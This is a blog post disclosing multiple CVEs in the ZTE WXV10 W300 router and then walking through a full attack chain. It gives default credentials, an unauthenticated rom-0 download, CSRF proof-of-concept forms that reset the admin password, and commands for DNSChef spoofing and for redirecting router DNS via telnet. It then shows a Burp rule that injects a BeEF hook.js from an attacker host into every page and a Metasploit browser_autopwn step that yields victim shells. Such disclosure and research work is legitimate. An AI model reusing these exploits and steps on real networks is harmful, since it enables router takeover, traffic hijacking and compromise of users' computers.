ZTE WXV10 W300 Multiple Vulnerabilities

Default Password Being Used (CVE-2014-4018)

In ZTE routers the username is a constant which is ā€œadminā€ and the password by default is ā€œadminā€

ROM-0 Backup File Disclosure (CVE-2014-4019)

There is a rom-0 backup file contains sensitive information such as the passwords. There is a disclosure in which anyone can download that file without any authentication by a simple GET request.

http://192.168.1.1/rom-0

You can find the router password using my rom-0 configuration decompressor.

View post on imgur.com

PPPoE/PPPoA Password Disclosure in tc2wanfun.js (CVE-2014-4154)

If you look at the frame source in the ā€œInternetā€ tab under the ā€œInterface Setupā€ you can see this doLoad function in line 542 which fetches the password and displays it there. The frame URI is /basic/home_wan.htm.

[code language=”javascript” highlight=”12″]
function doLoad() {
var value = document.forms[0].wanTypeRadio[2].checked;
doEnable();
QosCheck();
WANChkIdleTimeT();
if (value)
pppStaticCheck();
LockWhenPVC0();
LockPVC();
if(document.forms[0].wan_PPPPassword != null)
{
document.forms[0].wan_PPPPassword.value = pwdppp;
}
}
[/code]

The ā€œpwdppā€ is loaded from an external file which you can see at the bottom of the page.

[code language=”javascript”]
<script language="javascript" src="/basic/tc2wanfun.js"></script>
[/code]

Once the user authenticates the router till another successful restart the password is written in that external JS file.

View post on imgur.com

Admin Password Manipulation XSRF (CVE-2014-4155)

You can change the password to blank by requesting /Forms/tools_admin_1 with a GET requesting containing HTTP basic authentication.

POC:

[code language=”html”]
?iframe src="http://192.168.1.1/Forms/tools_admin_1" width="0" height="0">?/iframe>
[/code]

If you send something like above to the victim, he will be prompted for the login and once he enter his credentials, his password will be immediately changed to a blank password.
Of course since there is no XSRF token in the request you change the password as you wish.
POC:

[code language=”html”]
<html>
<body>
<form name="exploit" action="http://192.168.1.1/Forms/tools_admin_1" method="POST">
<input type="hidden" name="uiViewTools_Password" value="your_passwd" />
<input type="hidden" name="uiViewTools_PasswordConfirm" value="your_passwd" />
<script>document.exploit.submit(); </script>
</form>
</body>
</html>
[/code]

Denial Of Service

You can see my previous post about this vulnerability and exploit.

ZTE and TP-Link RomPager DoS


http://www.osvdb.org/show/osvdb/108076
http://packetstormsecurity.com/files/127076/ZTE-TP-Link-RomPager-Denial-Of-Service.html
http://www.exploit-db.com/exploits/33737

Compromising the System

In here I am considering the scope of the router only. So after exploiting the router what can we do in the post exploitation phase? There are so many things you can do. Out of them I will be demonstrating about DNS intercepting. Before reading this here is a small disclaimer from me. I will not show you to configure this using your external IP, you have to figure it out by yourself. I take no responsibility for any kind of damage you cause. Use these tools and methodologies for penetration testing, research and educational purposes only. For an untrained eye this might look like something illegal and using hacking tools for harming people. These tools are used in penetration testing and it is your sole responsibility to use them without harming anyone for ethical purposes. You can practice these in your home virtual lab.
In penetration testing there can be many methods to accomplish one task. Itā€™s the testerā€™s creativity to use the resources in an effective way. I will be using a DNS proxy DNSChef, A web server for forwarding requests Webmitm, An intercepting proxy such as Burp Suite, BeEF and Metasploit for compromising the victim.
Attacking machines:

  • Kali Linux ā€“ 192.168.1.4
  • Windows 8 ā€“ 192.168.1.6

Victim:

  • Windows XP- 192.168.1.5

Letā€™s do a nmap scan first
nmap -sV -sS -vv -T5 -p80 -oG – 192.168.1.1

  • -sV ā€“Ā Version Scan
  • -sS ā€“ SYN scan
  • -vv ā€“ Verbose mode, I am giving twice here
  • -T5 ā€“ Very Aggressive
  • -p ā€“ The port
  • -oG – Grepable Output, if we are scanning a large subnet this might come in handy in filtering only ā€˜RomPagerā€™ routers.

View post on imgur.com


Next based upon the above vulnerabilities you can get inside the router. We can get the rom-0 file by using wget since it requires just a GET request.

[code language=”html”]
wget http://192.168.1.1/rom-0 -O rom0
[/code]

After that you can use my decompressor to get the routerā€™s password.

View post on imgur.com


Now letā€™s start our DNS proxy.

[code language=”html”]
Dnschef –interface 192.168.1.4 –fakeip 192.168.1.4
[/code]

View post on imgur.com

  • –interface ā€“ By default it listens on localhost for security reasons. We will specify our interface to listen
  • –fakeip ā€“ This fake all replies to point to 192.168.1.4

Next we need to setup a small web server which can handle HTTP and HTTPS requests. I will be using webmitm which is a tool from the dsniff buddle. By default it forwards the data to the real sites instead we need to forward the requests to our intercepting proxy Burp.

[code language=”html”]
webmitm ā€“d 192.168.1.6
[/code]

  • -d for debugging purposes

View post on imgur.com

View post on imgur.com


We need to change the routerā€™s primary DNS to our attacking machine. For this you can change the DNS settings by using the web interface like this or using telnet.

View post on imgur.com


Using telnet type

[code language=”html”]
set lan dhcpdns [attacker machine] 8.8.8.8
[/code]

View post on imgur.com

I am using the secondary IP as 8.8.8.8 as we donā€™t need compromised hosts again and again requesting from us, instead they will request from Google.
After configuring the tools and the DNS we need to configure Burp. I am running Burp in a separate machine is because webmitm has already take port 80 and 443. We need to bind to port 80 and 443 on all interfaces using Burp and listen to all incoming connections. We are going to use invisible proxying since it allows non-proxy-aware clients to connect directly to a Proxy listener.

Letā€™s start the Browser Exploitation Framework on Kali.

View post on imgur.com


Now we need to inject our hook.js to the browser. For this purpose we set Burp to inject this script to each request intercepted by it. I’ll replace the &lt;head&gt; tag using

[code language=”HTML”]
<script src="http://192.168.1.4:3000/hook.js"></script></head>
[/code]

View post on imgur.com


I am replacing the tag to our malicious JS payload. Now burp will inject our payload to each webpage šŸ™‚
Well, that is it! Letā€™s browse using the victim machine and see. We can nicely see all the requests being nicely forwarded to us and since we are using Burp we can nicely intercept them. You can leave intercept off and view the HTTP History anytime.

View post on imgur.com


Letā€™s check the page source that Burp correctly injected our hook.js.

View post on imgur.com


It has successfully injected and letā€™s check the UI of BeEF.

View post on imgur.com


There are many things you can do with the browser. For the sake of this post letā€™s send a simple alert box and check.

View post on imgur.com

View post on imgur.com


Now how to compromise the system? There are many methods you can do it. I will start browser_autopwn and inject via an invisible iframe into browsers using BeEF šŸ˜‰
Letā€™s start browser_autopwn using metasloit

View post on imgur.com


Inject using BeEF’s invisible frame.

View post on imgur.com


And w00t! I got 7 sessions for Windows XP ha šŸ˜€ This is due to successful exploitation of 7 exploits.

View post on imgur.com


Here is a small video I made.

Hope you enjoyed this write-up šŸ˜‰
http://packetstormsecurity.com/files/127129/ZTE-WXV10-W300-Disclosure-CSRF-Default.html
http://www.exploit-db.com/exploits/33803
http://www.routerpwn.com/ZTE/

9 thoughts on “ZTE WXV10 W300 Multiple Vulnerabilities

  1. It’s really nice how you see things differently. Great Article machan keep it up :DDD hats off

Leave a Reply to Nuwan SrimalCancel reply